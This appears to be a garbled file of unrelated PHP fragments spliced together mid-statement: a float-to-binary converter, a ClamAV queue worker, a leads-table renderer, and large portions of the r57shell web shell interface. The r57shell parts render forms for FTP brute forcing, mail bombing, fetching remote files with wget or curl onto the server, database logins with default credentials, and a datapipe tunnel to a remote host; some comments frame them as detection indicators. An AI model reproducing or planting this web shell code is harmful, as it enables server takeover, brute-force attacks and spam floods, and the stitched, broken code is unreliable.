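/**
 * Format a number as three space-separated bit strings: sign, exponent, mantissa.
 *
 * The constants used (exponent bias 127, mantissa padded to 23 digits) suggest a
 * single-precision floating-point layout — NOTE(review): confirm against the caller.
 *
 * Relies on three helpers defined elsewhere in the file:
 *  - tenToBinary($fraction, 1): presumably returns the binary digits of the fractional part;
 *  - ws($value): its return value is used as the exponent (power-of-ten shift of the digit string);
 *  - addzero($n): presumably returns $n '0' characters.
 *
 * NOTE(review): the exponent only gets a leading '0' when it is exactly 0, and the
 * mantissa is padded but never truncated, so the fields are not guaranteed to be
 * 8 and 23 digits wide for every input — confirm whether that is intended.
 *
 * @param int|float $num Number to convert.
 * @return string "<sign> <exponent bits> <mantissa bits> " (note the trailing space).
 */
function main($num)
{
    // Sign bit: 1 for negative input, 0 otherwise; the rest works on the magnitude.
    if ($num < 0) {
        $s = 1;
        $num = -$num;
    } else {
        $s = 0;
    }

    // Split into integer and fractional parts and convert each to binary digits.
    $zs = floor($num);
    $bzs = decbin($zs);
    $xs = $num - $zs;

    // The binary digit string is stored as a decimal float so it can be shifted with pow(10, ...).
    $res = (double) ($bzs . '.' . tenToBinary($xs, 1));

    // Biased exponent; decbin(127) is only seven digits, hence the explicit leading zero.
    $teme = ws($res);
    $e = decbin($teme + 127);
    if ($teme == 0) {
        $e = '0' . $e;
    }

    // Normalise, then keep the digits after the decimal point as the mantissa.
    $temm = $res / pow(10, $teme);
    // end() takes its argument by reference; handing it the explode() result directly
    // raises "Only variables should be passed by reference", so use a local first.
    $parts = explode(".", $temm);
    $m = end($parts);

    // Right-pad the mantissa with zeros up to 23 digits.
    $lenm = strlen($m);
    if ($lenm < 23) {
        $m .= addzero(23 - $lenm);
    }

    return $s . ' ' . $e . ' ' . $m . ' ';
}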
echo sr(25, "<b>" . $lang[$language . '_text90'] . $arrow . "</b>", "<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>" . in('hidden', 'dir', 0, $dir)); echo sr(25, "", in('submit', 'submit', 0, $lang[$language . '_butt14'])); echo $te . "</td>" . $fe . $fs . "<td valign=top width=50%>" . $ts; echo "<font face=Verdana size=-2><b><div align=center id='n'>" . $lang[$language . '_text100'] . "</div></b></font>"; echo sr(25, "<b>" . $lang[$language . '_text88'] . $arrow . "</b>", in('text', 'ftp_server_port', 45, !empty($_POST['ftp_server_port']) ? $_POST['ftp_server_port'] : "127.0.0.1:21")); echo sr(25, "<b>" . $lang[$language . '_text37'] . $arrow . "</b>", in('text', 'ftp_login', 45, !empty($_POST['ftp_login']) ? $_POST['ftp_login'] : "******")); echo sr(25, "<b>" . $lang[$language . '_text38'] . $arrow . "</b>", in('text', 'ftp_password', 45, !empty($_POST['ftp_password']) ? $_POST['ftp_password'] : "******")); echo sr(25, "<b>" . $lang[$language . '_text18'] . $arrow . "</b>", in('text', 'loc_file', 45, $dir)); echo sr(25, "<b>" . $lang[$language . '_text89'] . $arrow . "</b>", in('text', 'ftp_file', 45, !empty($_POST['ftp_file']) ? $_POST['ftp_file'] : "/ftp-dir/file") . in('hidden', 'cmd', 0, 'ftp_file_up')); echo sr(25, "<b>" . $lang[$language . '_text90'] . $arrow . "</b>", "<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>" . in('hidden', 'dir', 0, $dir)); echo sr(25, "", in('submit', 'submit', 0, $lang[$language . '_butt2'])); echo $te . "</td>" . $fe . "</tr></div></table>"; } if ($unix && @function_exists("ftp_connect")) { echo $fs . $table_up1 . $lang[$language . '_text94'] . up_down('id18') . $table_up2 . div('id18') . $ts; echo sr(15, "<b>" . $lang[$language . '_text88'] . $arrow . "</b>", in('text', 'ftp_server_port', 85, !empty($_POST['ftp_server_port']) ? $_POST['ftp_server_port'] : "127.0.0.1:21") . in('hidden', 'cmd', 0, 'ftp_brute') . ws(4) . 
in('submit', 'submit', 0, $lang[$language . '_butt1'])); echo sr(15, "", "<font face=Verdana size=-2>" . $lang[$language . '_text99'] . " ( <a href=" . $_SERVER['PHP_SELF'] . "?users>" . $lang[$language . '_text95'] . "</a> )</font>"); echo sr(15, "", in('checkbox', 'reverse id=reverse', 0, '1') . $lang[$language . '_text101']); echo $te . '</div>' . $table_end1 . $fe; } if (@function_exists("mail")) { echo $table_up1 . $lang[$language . '_text102'] . up_down('id19') . $table_up2 . div('id19') . $ts . "<tr>" . $fs . "<td valign=top width=50%>" . $ts; echo "<font face=Verdana size=-2><b><div align=center id='n'>" . $lang[$language . '_text103'] . "</div></b></font>"; echo sr(25, "<b>" . $lang[$language . '_text105'] . $arrow . "</b>", in('text', 'to', 45, !empty($_POST['to']) ? $_POST['to'] : "*****@*****.**") . in('hidden', 'cmd', 0, 'mail') . in('hidden', 'dir', 0, $dir)); echo sr(25, "<b>" . $lang[$language . '_text106'] . $arrow . "</b>", in('text', 'from', 45, !empty($_POST['from']) ? $_POST['from'] : "*****@*****.**")); echo sr(25, "<b>" . $lang[$language . '_text107'] . $arrow . "</b>", in('text', 'subj', 45, !empty($_POST['subj']) ? $_POST['subj'] : "hello billy")); echo sr(25, "<b>" . $lang[$language . '_text108'] . $arrow . "</b>", '<textarea name=text cols=33 rows=2>' . (!empty($_POST['text']) ? $_POST['text'] : "mail text here") . '</textarea>'); echo sr(25, "", in('submit', 'submit', 0, $lang[$language . '_butt15'])); echo $te . "</td>" . $fe . $fs . "<td valign=top width=50%>" . $ts; echo "<font face=Verdana size=-2><b><div align=center id='n'>" . $lang[$language . '_text104'] . "</div></b></font>"; echo sr(25, "<b>" . $lang[$language . '_text105'] . $arrow . "</b>", in('text', 'to', 45, !empty($_POST['to']) ? $_POST['to'] : "*****@*****.**") . in('hidden', 'cmd', 0, 'mail_file') . in('hidden', 'dir', 0, $dir));
echo $fs . $table_up1 . $lang[$language . '_text85'] . $table_up2 . $ts; echo sr(15, "<b>" . $lang[$language . '_text36'] . $arrow . "</b>", in('text', 'test4_md', 15, !empty($_POST['test4_md']) ? $_POST['test4_md'] : "master") . ws(4) . "<b>" . $lang[$language . '_text37'] . $arrow . "</b>" . in('text', 'test4_ml', 15, !empty($_POST['test4_ml']) ? $_POST['test4_ml'] : "sa") . ws(4) . "<b>" . $lang[$language . '_text38'] . $arrow . "</b>" . in('text', 'test4_mp', 15, !empty($_POST['test4_mp']) ? $_POST['test4_mp'] : "password") . ws(4) . "<b>" . $lang[$language . '_text14'] . $arrow . "</b>" . in('text', 'test4_port', 15, !empty($_POST['test4_port']) ? $_POST['test4_port'] : "1433")); echo sr(15, "<b>" . $lang[$language . '_text3'] . $arrow . "</b>", in('text', 'test4_file', 96, !empty($_POST['test4_file']) ? $_POST['test4_file'] : "dir") . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test4') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8'])); echo $te . $table_end1 . $fe; } if (@ini_get('file_uploads')) { echo "<form name=upload method=POST ENCTYPE=multipart/form-data>"; echo $table_up1 . $lang[$language . '_text5'] . $table_up2 . $ts; echo sr(15, "<b>" . $lang[$language . '_text6'] . $arrow . "</b>", in('file', 'userfile', 85, '')); echo sr(15, "<b>" . $lang[$language . '_text21'] . $arrow . "</b>", in('checkbox', 'nf1 id=nf1', 0, '1') . in('text', 'new_name', 82, '') . in('hidden', 'dir', 0, $dir) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt2'])); echo $te . $table_end1 . $fe; } if (!$safe_mode && !$windows) { echo $fs . $table_up1 . $lang[$language . '_text15'] . $table_up2 . $ts; echo sr(15, "<b>" . $lang[$language . '_text16'] . $arrow . "</b>", "<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>" . 
in('hidden', 'dir', 0, $dir) . ws(2) . "<b>" . $lang[$language . '_text17'] . $arrow . "</b>" . in('text', 'rem_file', 78, 'http://')); echo sr(15, "<b>" . $lang[$language . '_text18'] . $arrow . "</b>", in('text', 'loc_file', 105, $dir) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt2'])); echo $te . $table_end1 . $fe; } if ($mysql_on || $mssql_on || $pg_on || $ora_on) { echo $table_up1 . $lang[$language . '_text82'] . $table_up2 . $ts . "<tr>" . $fs . "<td valign=top width=34%>" . $ts; echo "<font face=Verdana size=-2><b><div align=center>" . $lang[$language . '_text77'] . "</div></b></font>"; echo sr(45, "<b>" . $lang[$language . '_text80'] . $arrow . "</b>", "<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option></select>"); echo sr(45, "<b>" . $lang[$language . '_text14'] . $arrow . "</b>", in('text', 'db_port', 15, !empty($_POST['db_port']) ? $_POST['db_port'] : "3306")); echo sr(45, "<b>" . $lang[$language . '_text37'] . $arrow . "</b>", in('text', 'mysql_l', 15, !empty($_POST['mysql_l']) ? $_POST['mysql_l'] : "root")); echo sr(45, "<b>" . $lang[$language . '_text38'] . $arrow . "</b>", in('text', 'mysql_p', 15, !empty($_POST['mysql_p']) ? $_POST['mysql_p'] : "password")); echo sr(45, "<b>" . $lang[$language . '_text78'] . $arrow . "</b>", in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'db_show') . in('checkbox', 'st id=st', 0, '1')); echo sr(45, "<b>" . $lang[$language . '_text79'] . $arrow . "</b>", in('checkbox', 'sc id=sc', 0, '1')); echo sr(45, "", in('submit', 'submit', 0, $lang[$language . '_butt7'])); echo $te . "</td>" . $fe . $fs . "<td valign=top width=33%>" . $ts; echo "<font face=Verdana size=-2><b><div align=center>" . $lang[$language . '_text40'] . "</div></b></font>"; echo sr(45, "<b>" . $lang[$language . '_text80'] . $arrow . "</b>", "<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option></select>");
// Fragment of the r57shell web shell UI (the footer banner further down names it).
// This block renders the "datapipe" form: a local port, a remote host, a remote port and a
// Perl/C implementation choice. The form has no action attribute, so it posts back to the
// current URL; the handler that consumes these fields is not part of this excerpt.
// Detection note: the literal form and field names (datapipe, local_port, remote_host,
// remote_port, use) and the banner string below are usable as static indicators when
// sweeping a web root for planted shells.
// Shown only when $safe_mode and $windows are both falsy; both are set outside this excerpt.
if (!$safe_mode && !$windows) {
    echo "<div align=center><form name=datapipe method=POST>";
    // $table_up1/$table_up2/$font/$table_end1 are markup snippets defined elsewhere.
    echo $table_up1;
    echo $lang[$language . '_text22'];
    echo $table_up2;
    echo $font;
    // ws(n) is defined elsewhere; presumably it emits n spacing entities.
    echo "<b>" . ws(2) . $lang[$language . '_text23'] . $arrow . ws(1) . "</b>";
    // Pre-filled default for the local port field.
    echo "<input type=text name=local_port size=5 value=\"31337\">" . ws(1);
    echo "<b>" . ws(2) . $lang[$language . '_text24'] . $arrow . ws(1) . "</b>";
    // Pre-filled default for the remote host field.
    echo "<input type=text name=remote_host size=15 value=\"irc.dalnet.ru\">" . ws(1);
    echo "<b>" . ws(2) . $lang[$language . '_text25'] . $arrow . ws(1) . "</b>";
    // Pre-filled default for the remote port field.
    echo "<input type=text name=remote_port size=5 value=\"6667\">" . ws(1);
    echo "<b>" . ws(2) . $lang[$language . '_text26'] . $arrow . ws(1) . "</b>";
    // Implementation selector: the option values "Perl" and "C" are what gets posted.
    echo "<select size=\"1\" name=\"use\">";
    echo "<option value=\"Perl\">datapipe.pl</option>";
    echo "<option value=\"C\">datapipe.c</option>";
    echo "</select> ";
    echo ws(2) . "<input type=submit name=submit value=\" " . $lang[$language . '_butt5'] . " \">";
    // $dir is written unquoted and unescaped into the attribute value.
    echo "<input type=hidden name=dir value=" . $dir . ">";
    echo "</font>";
    echo $table_end1;
    echo "</form></div>";
}
// ---------------------------------------------------------------------------
// end table
echo "</table>";
/* (c) */
echo $table_up3;
// Self-identifying banner: product name, team, URL and the $version value.
echo "<div align=center><font face=Verdana size=-2><b>o---[ r57shell - http-shell by RusH security team | <a href=http://rst.void.ru>http://rst.void.ru</a> | version " . $version . " ]---o</b></font></div>";
echo "</td></tr></table>{$f}";
/* -------------------------[ EOF ]------------------------- */
// Excerpt from a queue worker that scans an uploaded file and reports the verdict.
// The enclosing try / loop / if openers are outside this excerpt, which is why the
// closing braces below have no visible counterpart.
// NOTE(review): $fid is concatenated into the path as-is; its origin is not visible here.
// If it comes from the job payload, confirm it cannot contain path separators or "..".
$path = $config['directorio_ficheros'] . '/' . $fid;
debug('Escaneando ' . $fid);
// $av->scan() returns an array: [0] is a status code, [1] a detail message.
$resav = $av->scan($path);
if ($resav[0] == 2) {
    // The ClamAV run itself failed
    debug("Error con " . $fid . ": " . $resav[1]);
    // ws() is defined elsewhere; here it receives the file id, a verdict label and a detail
    // string, and its return value is later compared with TRUE as a success flag.
    $exito = ws($fid, 'ERROR', $resav[1]);
    // NOTE(review): the job is buried here, yet the delete/release step below appears to
    // run for it as well — confirm that this is intended.
    $pheanstalk->bury($job);
} elseif ($resav[0] == 1) {
    // Infected
    debug("Fichero " . $fid . " infectado: " . $resav[1]);
    $exito = ws($fid, 'INFECTADO', $resav[1]);
} else {
    // Clean (any status other than 1 or 2 lands here)
    debug("Fichero " . $fid . " limpio ");
    $exito = ws($fid, 'LIMPIO', '');
}
}
// Release the job... or wait
if ($exito === TRUE) {
    // Verdict was reported successfully: remove the job from the queue.
    $pheanstalk->delete($job);
} else {
    // Reporting failed: put the job back and pause for 10 seconds before continuing.
    $pheanstalk->release($job);
    debug("No funcionó bien " . $job->getData() . ". Esperando.");
    sleep(10);
}
}
}
} catch (Exception $e) {
    // var_export() dumps the whole exception object, not just its message.
    // NOTE(review): confirm this output only reaches an operator-visible log or console.
    echo "Error!: " . var_export($e, TRUE) . "\n";
    exit(1);
echo sr(25, "", in('submit', 'submit', 0, $lang[$language . '_butt15'])); echo $te . "</td>" . $fe . $fs . "<td valign=top width=33%>" . $ts; echo "<font face=Verdana size=-2><b><div align=center id='n'>" . $lang[$language . '_text104'] . "</div></b></font>"; echo sr(25, "<b>" . $lang[$language . '_text105'] . $arrow . "</b>", in('text', 'to', 30, !empty($_POST['to']) ? $_POST['to'] : "*****@*****.**") . in('hidden', 'cmd', 0, 'mail_file') . in('hidden', 'dir', 0, $dir)); echo sr(25, "<b>" . $lang[$language . '_text106'] . $arrow . "</b>", in('text', 'from', 30, !empty($_POST['from']) ? $_POST['from'] : "*****@*****.**")); echo sr(25, "<b>" . $lang[$language . '_text107'] . $arrow . "</b>", in('text', 'subj', 30, !empty($_POST['subj']) ? $_POST['subj'] : "file from r57shell")); echo sr(25, "<b>" . $lang[$language . '_text18'] . $arrow . "</b>", in('text', 'loc_file', 30, $dir)); echo sr(25, "<b>" . $lang[$language . '_text91'] . $arrow . "</b>", in('radio', 'compress', 0, 'none', 1) . ' ' . $arh); echo sr(25, "", in('submit', 'submit', 0, $lang[$language . '_butt15'])); echo $te . "</td>" . $fe . $fs . "<td valign=top width=33%>" . $ts; echo "<font face=Verdana size=-2><b><div align=center id='n'>" . $lang[$language . '_text139'] . "</div></b></font>"; echo sr(25, "<b>" . $lang[$language . '_text105'] . $arrow . "</b>", in('text', 'to', 30, !empty($_POST['to']) ? $_POST['to'] : "*****@*****.**") . in('hidden', 'cmd', 0, 'mail_bomber') . in('hidden', 'dir', 0, $dir)); echo sr(25, "<b>" . $lang[$language . '_text106'] . $arrow . "</b>", in('text', 'from', 30, !empty($_POST['from']) ? $_POST['from'] : "*****@*****.**")); echo sr(25, "<b>" . $lang[$language . '_text107'] . $arrow . "</b>", in('text', 'subj', 30, !empty($_POST['subj']) ? $_POST['subj'] : "hello billy")); echo sr(25, "<b>" . $lang[$language . '_text108'] . $arrow . "</b>", '<textarea name=text cols=22 rows=1>' . (!empty($_POST['text']) ? $_POST['text'] : "flood text here") . 
'</textarea>'); echo sr(25, "<b>Flood" . $arrow . "</b>", in('int', 'mail_flood', 5, !empty($_POST['mail_flood']) ? $_POST['mail_flood'] : 100) . ws(4) . "<b>Size(kb)" . $arrow . "</b>" . in('int', 'mail_size', 5, !empty($_POST['mail_size']) ? $_POST['mail_size'] : 10)); echo sr(25, "", in('submit', 'submit', 0, $lang[$language . '_butt15'])); echo $te . "</td>" . $fe . "</tr></div></table>"; } if ($mysql_on || $mssql_on || $pg_on || $ora_on) { $select = '<select name=db>'; if ($mysql_on) { $select .= '<option>MySQL</option>'; } if ($mssql_on) { $select .= '<option>MSSQL</option>'; } if ($pg_on) { $select .= '<option>PostgreSQL</option>'; } if ($ora_on) {
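/**
 * Build the <tbody id="mtb"> markup for the leads table.
 *
 * Reads the globals $DB (database wrapper), $numCols (column count used for the
 * "no results" row) and $rightsfilter (SQL fragment ANDed onto the WHERE clause).
 * Calls getCriteria(), ws(), dateFix(), getRep() and getRepField(), all defined elsewhere.
 *
 * Database values placed inside HTML attributes (row ids, the reason tooltip, the
 * hidden comments/info inputs) are escaped, and the quote file name is URL-encoded,
 * so a quote or angle bracket in stored data can no longer break out of the attribute.
 *
 * NOTE(review): the WHERE clause is assembled from getCriteria() and $rightsfilter as
 * raw SQL. Neither is visible here; if either is derived from request input it must be
 * parameterised or whitelisted at its source.
 * NOTE(review): cell text (jobname, company, customer, status, estimated, rep names) is
 * still emitted without HTML escaping because it passes through ws(), whose behaviour is
 * not visible here — confirm and escape at that point if ws() does not.
 * NOTE(review): forcedownload.php receives a file name from the query string; confirm it
 * rejects path traversal.
 *
 * @return string The complete <tbody> element.
 */
function getTbody()
{
    global $DB;
    global $numCols;
    global $rightsfilter;

    // Escape a value for a double-quoted HTML attribute. No charset is passed so the
    // configured default applies; ENT_SUBSTITUTE keeps badly encoded input from
    // collapsing to an empty string.
    $attr = function ($value) {
        return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE);
    };

    // Default to pending leads when no search criteria are set.
    $criteria = getCriteria();
    $where = (strlen($criteria)) ? $criteria : ' status = "pending" ';
    $where .= ' AND ' . $rightsfilter;

    $sql = "SELECT *, CONCAT('$',estimated) as estimated FROM leads WHERE " . $where . " ORDER BY company, customer";
    $res = $DB->query($sql);

    $ret = '<tbody id="mtb">' . "\n";
    while ($r = $DB->fetchNextObject($res)) {
        $id = $attr($r->id);

        $ret .= "\t";
        $ret .= '<tr id="row' . $id . '">';
        $ret .= '<td align="center">' . stripslashes(ws($r->id)) . '</td>';
        $ret .= '<td>' . stripslashes(ws($r->jobname)) . '</td>';
        $ret .= '<td>' . stripslashes(ws($r->company)) . '</td>';
        $ret .= '<td>' . stripslashes(ws($r->customer)) . '</td>';
        $ret .= '<td>' . ws(dateFix($r->targetdate)) . '</td>';

        // Status column: closed leads show the closing date; others show the status,
        // linked to a tooltip when a reason was recorded.
        if ($r->status == 'closed') {
            $statushtml = dateFix($r->dateclosed);
            $hideclass = 'class="hideclosed"';
        } else {
            if (strlen($r->reason) > 0) {
                $repreason = ($r->reason_repid)
                    ? '<i><small><br /><br />-' . getRep($r->reason_repid) . '-</small></i>'
                    : '';
                $reason = $r->reason . "\n\n";
                // Attribute-level escaping leaves the value the browser exposes to scripts
                // unchanged, including the markup in $repreason.
                $statushtml = '<a href="#" rel="' . $attr($reason) . '" class="moreinfo" title="'
                    . $attr($reason . $repreason) . '">' . $r->status . '</a>';
            } else {
                $statushtml = $r->status;
            }
            $hideclass = '';
        }
        $ret .= '<td ' . $hideclass . '>' . ws($statushtml) . '</td>';

        $ret .= '<td>' . ws(dateFix($r->createdon)) . '</td>';

        // Initials of the rep who quoted the lead.
        $ret .= '<td align="center">';
        $ret .= ws(getRepField($r->quotedby_repid, 'LOWER(CONCAT(SUBSTRING(firstname, 1, 1), SUBSTRING(lastname, 1, 1)))'));
        $ret .= '</td>';

        $ret .= '<td>';
        $ret .= ($r->rep == 0) ? 'n/a' : getRep($r->rep);
        $ret .= '</td>';

        $ret .= '<td>' . $r->estimated . '</td>';

        // Attachment link; the file name is URL-encoded so it stays a single query value.
        $ret .= '<td>';
        $ret .= (strlen($r->quotefile) > 0)
            ? '<a href="_lib/php/forcedownload.php?filename=' . rawurlencode(stripslashes($r->quotefile)) . '"> <img src="images/quote_icon.png" width="16" height="16" border="0" title="view attachment" /> </a>'
            : ws('');
        $ret .= '</td>';

        // Action cell with hidden inputs carrying the comments and audit info.
        $ret .= '<td id="' . $id . '" class="actionbt">action';
        $ret .= '<input id="comments_' . $id . '" type="hidden" value="' . $attr($r->comments) . '" />';

        $info = '';
        $info .= 'created by: ' . getRep($r->createdby_repid) . "\n";
        $info .= 'created on: ' . dateFix($r->createdon) . "\n\n";
        $info .= 'last updated by: ' . getRep($r->lastupdatedby_repid) . "\n";
        $info .= 'last updated on: ' . dateFix($r->lastupdated) . "\n\n";
        $ret .= '<input id="info_' . $id . '" type="hidden" value="' . $attr($info) . '" />';

        $ret .= '</td>';
        $ret .= '</tr>' . "\n";
    }

    // Show a placeholder row when the query returned nothing.
    if ($DB->numRows($res) < 1) {
        $ret .= '<tr id="nores">';
        $ret .= '<td colspan="' . $numCols . '" >No results found</td>';
        $ret .= '</tr>';
    }

    $ret .= '</tbody>';

    return $ret;
}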